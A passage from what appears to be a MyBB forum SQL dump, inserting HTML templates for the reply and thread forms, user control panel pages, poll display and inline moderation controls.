valign=\"top\"><strong>{$lang->your_message}</strong><br />{$smilieinserter}</td>\n<td class=\"trow2\">\n<textarea id=\"message\" name=\"message\" rows=\"20\" cols=\"70\" tabindex=\"2\" >{$message}</textarea>\n{$codebuttons}\n{$multiquote_external}\n</td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->post_options}</strong></td>\n<td class=\"trow1\"><span class=\"smalltext\">\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[signature]\" value=\"1\" tabindex=\"6\"{$postoptionschecked[\'signature\']} /> {$lang->options_sig}</label>\n{$disablesmilies}\n</span></td>\n</tr>\n{$modoptions}\n{$subscriptionmethod}\n{$captcha}\n</table>\n{$attachbox}\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->post_reply}\" tabindex=\"3\" accesskey=\"s\" /> <input type=\"submit\" class=\"button\" name=\"previewpost\" value=\"{$lang->preview_post}\" tabindex=\"4\" />{$savedraftbutton}</div>\n<input type=\"hidden\" name=\"action\" value=\"do_newreply\" />\n<input type=\"hidden\" name=\"replyto\" value=\"{$replyto}\" />\n<input type=\"hidden\" name=\"posthash\" value=\"{$posthash}\" />\n<input type=\"hidden\" name=\"attachmentaid\" value=\"\" />\n<input type=\"hidden\" name=\"attachmentact\" value=\"\" />\n<input type=\"hidden\" name=\"quoted_ids\" value=\"{$quoted_ids}\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n{$editdraftpid}\n</form>\n{$forumrules}\n{$threadreview}\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('39', 'newreply_disablesmilies', '<br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[disablesmilies]\" value=\"1\" tabindex=\"9\"{$postoptionschecked[\'disablesmilies\']} /> {$lang->options_disablesmilies}</label>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('40', 'usercp_drafts', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->drafts}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"usercp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"4\"><strong>{$lang->drafts} {$draftcount}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->draft_title}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->draft_saved}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->draft_options}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"1\"><input type=\"checkbox\" class=\"checkbox checkall\" /></td>\n</tr>\n{$drafts}\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_drafts\" />\n<input type=\"submit\" class=\"button\" name=\"draftman\" value=\"{$lang->delete_drafts}\" $disable_delete_drafts />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('41', 'usercp_drafts_draft', '<tr>\n<td class=\"{$trow}\"><strong>{$draft[\'subject\']}</strong><br /><span class=\"smalltext\">{$detail}</span></td>\n<td class=\"{$trow}\" align=\"center\">{$savedate}, {$savetime}</td>\n<td class=\"{$trow}\" align=\"center\"><a href=\"{$editurl}\">{$lang->edit_draft}</a></td>\n<td class=\"{$trow}\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"deletedraft[{$id}]\" value=\"{$type}\" /></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('42', 'newthread', '<html>\n<head>\n<title>{$lang->newthread_in}</title>\n{$headerinclude}\n<script type=\"text/javascript\" src=\"jscripts/post.js?ver=1400\"></script>\n</head>\n<body>\n{$header}\n{$preview}\n{$thread_errors}\n{$attacherror}\n<form action=\"newthread.php?fid={$fid}&amp;processed=1\" method=\"post\" enctype=\"multipart/form-data\" name=\"input\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->post_new_thread}</strong></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow2\" width=\"20%\"><strong>{$lang->thread_subject}</strong></td>\n<td class=\"trow2\">{$prefixselect}<input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"1\" /></td>\n</tr>\n{$posticons}\n<tr>\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->your_message}</strong>{$smilieinserter}</td>\n<td class=\"trow2\">\n<textarea name=\"message\" id=\"message\" rows=\"20\" cols=\"70\" tabindex=\"2\">{$message}</textarea>\n{$codebuttons}\n{$multiquote_external}\n</td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->post_options}</strong></td>\n<td class=\"trow1\"><span class=\"smalltext\">\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[signature]\" value=\"1\" tabindex=\"7\"{$postoptionschecked[\'signature\']} /> {$lang->options_sig}</label>\n{$disablesmilies}</span></td>\n</tr>\n{$modoptions}\n{$subscriptionmethod}\n{$pollbox}\n{$captcha}\n</table>\n{$attachbox}\n<br />\n<div style=\"text-align:center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->post_thread}\" tabindex=\"4\" accesskey=\"s\" /> <input type=\"submit\" class=\"button\" name=\"previewpost\" value=\"{$lang->preview_post}\" tabindex=\"5\" />{$savedraftbutton}</div>\n<input type=\"hidden\" name=\"action\" value=\"do_newthread\" />\n<input type=\"hidden\" name=\"posthash\" value=\"{$posthash}\" />\n<input type=\"hidden\" name=\"attachmentaid\" value=\"\" />\n<input type=\"hidden\" name=\"attachmentact\" value=\"\" />\n<input type=\"hidden\" name=\"quoted_ids\" value=\"{$quoted_ids}\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n{$editdraftpid}\n</form>\n{$forumrules}\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('43', 'newthread_disablesmilies', '<br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[disablesmilies]\" value=\"1\" tabindex=\"9\"{$postoptionschecked[\'disablesmilies\']} /> {$lang->options_disablesmilies}</label>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('44', 'usercp_nav', '<td width=\"{$lang->ucp_nav_width}\" valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\"><strong>{$lang->ucp_nav_menu}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1 smalltext\"><a href=\"usercp.php\" class=\"usercp_nav_item usercp_nav_home\">{$lang->ucp_nav_home}</a></td>\n </tr>\n{$usercpmenu}\n</table>\n</td>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('45', 'usercp_nav_messenger', '<tr>\n <td class=\"tcat\">\n <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercppms\']}.gif\" id=\"usercppms_img\" class=\"expander\" alt=\"[-]\"/></div>\n <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_messenger}</strong></span></div>\n </td>\n</tr>\n<tbody style=\"{$collapsed[\'usercppms_e\']}\" id=\"usercppms_e\">\n <tr><td class=\"trow1 smalltext\"><a href=\"private.php?action=send\" class=\"usercp_nav_item usercp_nav_composepm\">{$lang->ucp_nav_compose}</a></td></tr>\n <tr>\n <td class=\"trow1 smalltext\">\n {$folderlinks}\n </td>\n </tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"private.php?action=tracking\" class=\"usercp_nav_item usercp_nav_pmtracking\">{$lang->ucp_nav_tracking}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"private.php?action=folders\" class=\"usercp_nav_item usercp_nav_pmfolders\">{$lang->ucp_nav_edit_folders}</a></td></tr>\n</tbody>\n', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('46', 'usercp_nav_profile', '<tr>\n <td class=\"tcat\">\n <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercpprofile\']}.gif\" id=\"usercpprofile_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_profile}</strong></span></div>\n </td>\n</tr>\n<tbody style=\"{$collapsed[\'usercpprofile_e\']}\" id=\"usercpprofile_e\">\n <tr><td class=\"trow1 smalltext\">\n <div><a href=\"usercp.php?action=profile\" class=\"usercp_nav_item usercp_nav_profile\">{$lang->ucp_nav_edit_profile}</a></div>\n {$changenameop}\n <div><a href=\"usercp.php?action=password\" class=\"usercp_nav_item usercp_nav_password\">{$lang->ucp_nav_change_pass}</a></div>\n <div><a href=\"usercp.php?action=email\" class=\"usercp_nav_item usercp_nav_email\">{$lang->ucp_nav_change_email}</a></div>\n <div><a href=\"usercp.php?action=avatar\" class=\"usercp_nav_item usercp_nav_avatar\">{$lang->ucp_nav_change_avatar}</a></div>\n {$changesigop}\n </td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=options\" class=\"usercp_nav_item usercp_nav_options\">{$lang->ucp_nav_edit_options}</a></td></tr>\n</tbody>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('47', 'usercp_nav_editsignature', '<div><a href=\"usercp.php?action=editsig\" class=\"usercp_nav_item usercp_nav_editsig\">{$lang->ucp_nav_edit_sig}</a></div>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('48', 'usercp_nav_misc', '<tr>\n <td class=\"tcat\">\n <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercpmisc\']}.gif\" id=\"usercpmisc_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_misc}</strong></span></div>\n </td>\n</tr>\n<tbody style=\"{$collapsed[\'usercpmisc_e\']}\" id=\"usercpmisc_e\">\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=usergroups\" class=\"usercp_nav_item usercp_nav_usergroups\">{$lang->ucp_nav_usergroups}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=editlists\" class=\"usercp_nav_item usercp_nav_editlists\">{$lang->ucp_nav_editlists}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=attachments\" class=\"usercp_nav_item usercp_nav_attachments\">{$lang->ucp_nav_attachments}</a></td></tr>\n <tr><td class=\"trow1 smalltext\">{$draftstart}<a href=\"usercp.php?action=drafts\" class=\"usercp_nav_item usercp_nav_drafts\">{$lang->ucp_nav_drafts} {$draftcount}</a>{$draftend}</td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=subscriptions\" class=\"usercp_nav_item usercp_nav_subscriptions\">{$lang->ucp_nav_subscribed_threads}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=forumsubscriptions\" class=\"usercp_nav_item usercp_nav_fsubscriptions\">{$lang->ucp_nav_forum_subscriptions}</a></td></tr>\n <tr><td class=\"trow1 smalltext\"><a href=\"{$profile_link}\" class=\"usercp_nav_item usercp_nav_viewprofile\">{$lang->ucp_nav_view_profile}</a></td></tr>\n</tbody>', '-2', '1601', '', '1339729416'); INSERT INTO mybb_templates VALUES('49', 'usercp_profile_away', '<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->away_information}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->away_status}</span></td>\n</tr>\n<tr>\n<td><span class=\"smalltext\"><input type=\"radio\" class=\"radio\" name=\"away\" value=\"1\" {$awaycheck[\'1\']} /> {$lang->im_away}</span></td>\n<td><span class=\"smalltext\"><input type=\"radio\" class=\"radio\" name=\"away\" value=\"0\" {$awaycheck[\'0\']} /> {$lang->im_here}</span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->away_reason}</span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><input type=\"text\" class=\"textbox\" name=\"awayreason\" value=\"{$user[\'awayreason\']}\" size=\"25\" /></td>\n</tr>\n</table>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n<tr>\n<td colspan=\"3\"><span class=\"smalltext\">{$lang->return_date}</span></td>\n</tr>\n<tr>\n<td>\n<select name=\"awayday\">\n<option value=\"\">&nbsp;</option>\n{$returndatesel}\n</select>\n</td>\n<td>\n<select name=\"awaymonth\">\n<option value=\"\">&nbsp;</option>\n<option value=\"1\" {$returndatemonthsel[\'1\']}>{$lang->month_1}</option>\n<option value=\"2\" {$returndatemonthsel[\'2\']}>{$lang->month_2}</option>\n<option value=\"3\" {$returndatemonthsel[\'3\']}>{$lang->month_3}</option>\n<option value=\"4\" {$returndatemonthsel[\'4\']}>{$lang->month_4}</option>\n<option value=\"5\" {$returndatemonthsel[\'5\']}>{$lang->month_5}</option>\n<option value=\"6\" {$returndatemonthsel[\'6\']}>{$lang->month_6}</option>\n<option value=\"7\" {$returndatemonthsel[\'7\']}>{$lang->month_7}</option>\n<option value=\"8\" {$returndatemonthsel[\'8\']}>{$lang->month_8}</option>\n<option value=\"9\" {$returndatemonthsel[\'9\']}>{$lang->month_9}</option>\n<option value=\"10\" {$returndatemonthsel[\'10\']}>{$lang->month_10}</option>\n<option value=\"11\" {$returndatemonthsel[\'11\']}>{$lang->month_11}</option>\n<option value=\"12\" {$returndatemonthsel[\'12\']}>{$lang->month_12}</option>\n</select>\n</td>\n<td>\n<input type=\"text\" class=\"textbox\" size=\"4\" maxlength=\"4\" name=\"awayyear\" value=\"{$returndate[\'2\']}\" />\n</td>\n</tr>\n</table>\n</fieldset>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('50', 'usercp_options', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->edit_options}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"usercp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$errors}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_options}</strong></td>\n</tr>\n<tr>\n<td width=\"50%\" class=\"trow1\" valign=\"top\">\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->login_cookies_privacy}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"2\">\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"invisible\" id=\"invisible\" value=\"1\" {$invisiblecheck} /></td>\n<td><span class=\"smalltext\"><label for=\"invisible\">{$lang->invisible_mode}</label></span></td>\n</tr>\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->messaging_notification}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"2\">\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"allownotices\" id=\"allownotices\" value=\"1\" {$allownoticescheck} /></td>\n<td><span class=\"smalltext\"><label for=\"allownotices\">{$lang->allow_notices}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"hideemail\" id=\"hideemail\" value=\"1\" {$hideemailcheck} /></td>\n<td><span class=\"smalltext\"><label for=\"hideemail\">{$lang->allow_emails}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"receivepms\" id=\"receivepms\" value=\"1\" {$receivepmscheck} /></td>\n<td><span class=\"smalltext\"><label for=\"receivepms\">{$lang->receive_pms}</label></span></td>\n</tr>\n{$pms_from_buddys}\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotice\" id=\"pmnotice\" value=\"1\"{$pmnoticecheck} /></td>\n<td><span class=\"smalltext\"><label for=\"pmnotice\">{$lang->pm_notice}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotify\" id=\"pmnotify\" value=\"1\" {$pmnotifycheck} /></td>\n<td><span class=\"smalltext\"><label for=\"pmnotify\">{$lang->pm_notify}</label></span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\"><label for=\"subscriptionmethod\">{$lang->subscription_method}</label></span></td>\n</tr>\n<tr>\n<td colspan=\"2\">\n <select name=\"subscriptionmethod\" id=\"subscriptionmethod\">\n <option value=\"0\" {$no_subscribe_selected}>{$lang->no_auto_subscribe}</option>\n <option value=\"1\" {$no_email_subscribe_selected}>{$lang->no_email_subscribe}</option>\n <option value=\"2\" {$instant_email_subscribe_selected}>{$lang->instant_email_subscribe}</option>\n </select>\n</td>\n</tr>\n\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->date_time_options}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"2\">\n<tr>\n<td><span class=\"smalltext\">{$lang->date_format}</span></td>\n</tr>\n<tr>\n<td>\n<select name=\"dateformat\">\n{$date_format_options}\n</select>\n</td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->time_format}</span></td>\n</tr>\n<tr>\n<td>\n<select name=\"timeformat\">\n{$time_format_options}\n</select>\n</td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->time_offset_desc}</span></td>\n</tr>\n<tr>\n<td>{$tzselect}</td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->dst_correction}</span></td>\n</tr>\n<tr>\n<td>\n <select name=\"dstcorrection\">\n <option value=\"2\" {$dst_auto_selected}>{$lang->dst_correction_auto}</option>\n <option value=\"1\" {$dst_enabled_selected}>{$lang->dst_correction_enabled}</option>\n <option value=\"0\" {$dst_disabled_selected}>{$lang->dst_correction_disabled}</option>\n </select>\n</td>\n</tr>\n</table>\n</fieldset>\n</td>\n<td width=\"50%\" class=\"trow1\" valign=\"top\">\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->forum_display_options}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"2\">\n{$tppselect}\n<tr>\n<td><span class=\"smalltext\">{$lang->thread_view}</span></td>\n</tr>\n<tr>\n<td>\n<select name=\"daysprune\">\n<option value=\"\">{$lang->use_default}</option>\n<option value=\"1\" {$daysprunesel[\'1\']}>{$lang->thread_view_lastday}</option>\n<option value=\"5\" {$daysprunesel[\'5\']}>{$lang->thread_view_5days}</option>\n<option value=\"10\" {$daysprunesel[\'10\']}>{$lang->thread_view_10days}</option>\n<option value=\"20\" {$daysprunesel[\'20\']}>{$lang->thread_view_20days}</option>\n<option value=\"50\" {$daysprunesel[\'50\']}>{$lang->thread_view_50days}</option>\n<option value=\"75\" {$daysprunesel[\'75\']}>{$lang->thread_view_75days}</option>\n<option value=\"100\" {$daysprunesel[\'100\']}>{$lang->thread_view_100days}</option>\n<option value=\"365\" {$daysprunesel[\'365\']}>{$lang->thread_view_year}</option>\n<option value=\"9999\" {$daysprunesel[\'9999\']}>{$lang->thread_view_all}</option>\n</select>\n</td>\n</tr>\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->thread_view_options}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"2\">\n <tr>\n <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"classicpostbit\" id=\"classicpostbit\" value=\"1\" {$classicpostbitcheck} /></td>\n <td><span class=\"smalltext\"><label for=\"classicpostbit\">{$lang->show_classic_postbit}</label></span></td>\n </tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showsigs\" id=\"showsigs\" value=\"1\" {$showsigscheck} /></td>\n<td><span class=\"smalltext\"><label for=\"showsigs\">{$lang->show_sigs}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showavatars\" id=\"showavatars\" value=\"1\" {$showavatarscheck} /></td>\n<td><span class=\"smalltext\"><label for=\"showavatars\">{$lang->show_avatars}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showquickreply\" id=\"showquickreply\" value=\"1\" {$showquickreplycheck} /></td>\n<td><span class=\"smalltext\"><label for=\"showquickreply\">{$lang->show_quick_reply}</label></span></td>\n</tr>\n{$pppselect}\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->thread_mode}</span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><select name=\"threadmode\"><option value=\"\">{$lang->use_default}</option><option value=\"linear\" {$threadview[\'linear\']}>{$lang->linear}</option><option value=\"threaded\" {$threadview[\'threaded\']}>{$lang->threaded}</option></select></td>\n</tr>\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->other_options}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"2\">\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showredirect\" id=\"showredirect\" value=\"1\" {$showredirectcheck} /></td>\n<td><span class=\"smalltext\"><label for=\"showredirect\">{$lang->show_redirect}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showcodebuttons\" id=\"showcodebuttons\" value=\"1\" {$showcodebuttonscheck} /></td>\n<td><span class=\"smalltext\"><label for=\"showcodebuttons\">{$lang->show_codebuttons}</label></span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->style}</span></td>\n</tr>\n<tr>\n<td colspan=\"2\">{$stylelist}</td>\n</tr>\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->board_language}</span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><select name=\"language\"><option value=\"\">{$lang->use_default}</option><option value=\"0\">-----------</option>{$langoptions}</select></td>\n</tr>\n</table>\n</fieldset>\n</td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_options\" />\n<input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->update_options}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('51', 'usercp_subscriptions_none', '<tr>\n<td class=\"trow1\" colspan=\"7\">{$lang->no_thread_subscriptions}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('52', 'usercp_drafts_none', '<tr>\n<td class=\"trow1\" colspan=\"7\">{$lang->no_drafts}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('53', 'usercp_subscriptions_thread', '<tr>\n <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"{$folder_label}\" title=\"{$folder_label}\" /></td>\n <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\">{$icon}</td>\n <td class=\"{$bgcolor}\">{$gotounread}{$thread[\'threadprefix\']}<a href=\"{$thread[\'threadlink\']}\" class=\"{$new_class}\">{$thread[\'subject\']}</a><br /><span class=\"smalltext\">{$lang->notification_method} {$notification_type}</span></td>\n <td align=\"center\" class=\"{$bgcolor}\"><a href=\"javascript:MyBB.whoPosted({$thread[\'tid\']});\">{$thread[\'replies\']}</a></td>\n <td align=\"center\" class=\"{$bgcolor}\">{$thread[\'views\']}</td>\n <td class=\"{$bgcolor}\" style=\"white-space: nowrap\">\n <span class=\"smalltext\">{$lastpostdate} {$lastposttime}<br />\n <a href=\"{$thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}</span>\n </td>\n <td class=\"{$bgcolor}\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"check[{$thread[\'tid\']}]\" value=\"{$thread[\'tid\']}\" /></td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('54', 'usercp_subscriptions_remove', '<tr>\n <td class=\"tfoot\" colspan=\"7\">\n <div class=\"float_right\">\n <strong>{$lang->with_selected}</strong>\n <select name=\"do\">\n <option value=\"delete\">{$lang->delete_subscriptions}</option>\n <option value=\"no_notification\">{$lang->update_no_notification}</option>\n <option value=\"instant_notification\">{$lang->update_instant_notification}</option>\n </select>\n {$gobutton}\n </div>\n <div>\n <strong><a href=\"usercp2.php?action=removesubscriptions&amp;my_post_key={$mybb->post_code}\">{$lang->remove_all_subscriptions}</a></strong>\n </div>\n </td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('55', 'header_welcomeblock_member_admin', ' &mdash; <a href=\"{$mybb->settings[\'bburl\']}/{$config[\'admin_dir\']}/index.php\">{$lang->welcome_admin}</a>', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('56', 'forumdisplay_newthread', '<a href=\"newthread.php?fid={$fid}\"><img src=\"{$theme[\'imglangdir\']}/newthread.gif\" alt=\"{$lang->post_thread}\" title=\"{$lang->post_thread}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('57', 'showthread_threaded_bitactive', '<div style=\"margin-left: {$indentsize}px;\"><strong>{$post[\'subject\']}</strong> <span class=\"smalltext\">- {$lang->by} {$post[\'profilelink\']} - {$postdate} {$posttime}</span></div>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('58', 'showthread_threaded_bit', '<div style=\"margin-left: {$indentsize}px;\"><a href=\"showthread.php?tid={$tid}&amp;pid={$post[\'pid\']}&amp;mode=threaded\">{$post[\'subject\']}</a> <span class=\"smalltext\">- {$lang->by} {$post[\'profilelink\']} - {$postdate}, {$posttime}</span></div>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('59', 'showthread_poll', '<form action=\"polls.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"vote\" />\n<input type=\"hidden\" name=\"pid\" value=\"{$poll[\'pid\']}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td colspan=\"4\" class=\"thead\" align=\"center\"><strong>{$lang->poll} {$poll[\'question\']}</strong></td>\n</tr>\n{$polloptions}\n</table>\n<table width=\"100%\" align=\"center\">\n<tr>\n<td><input type=\"submit\" class=\"button\" value=\"{$lang->vote}\" /></td>\n<td valign=\"top\" align=\"right\"><span class=\"smalltext\">[<a href=\"polls.php?action=showresults&amp;pid={$poll[\'pid\']}\">{$lang->show_results}</a>{$edit_poll}]</span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$publicnote}</span></td>\n</tr>\n</table>\n</form>', '-2', '1604', '', '1339729416'); INSERT INTO mybb_templates VALUES('60', 'forumdisplay_inlinemoderation_custom', '<optgroup label=\"{$lang->custom_mod_tools}\">{$customthreadtools}</optgroup>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('61', 'forumdisplay_inlinemoderation_custom_tool', '<option value=\"{$tool[\'tid\']}\">{$tool[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('62', 'forumdisplay_inlinemoderation', '<script type=\"text/javascript\" src=\"jscripts/inline_moderation.js?ver=1600\"></script>\n <form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"fid\" value=\"{$fid}\" />\n<input type=\"hidden\" name=\"modtype\" value=\"inlinethread\" />\n<span class=\"smalltext\"><strong>{$lang->inline_thread_moderation}</strong></span>\n<select name=\"action\">\n <option value=\"delayedmoderation\">{$lang->delayed_moderation}</option>\n <optgroup label=\"{$lang->standard_mod_tools}\">\n <option value=\"multiclosethreads\" selected=\"selected\">{$lang->close_threads}</option>\n <option value=\"multiopenthreads\">{$lang->open_threads}</option>\n <option value=\"multistickthreads\">{$lang->stick_threads}</option>\n <option value=\"multiunstickthreads\">{$lang->unstick_threads}</option>\n <option value=\"multideletethreads\">{$lang->delete_threads}</option>\n <option value=\"multimovethreads\">{$lang->move_threads}</option>\n <option value=\"multiapprovethreads\">{$lang->approve_threads}</option>\n <option 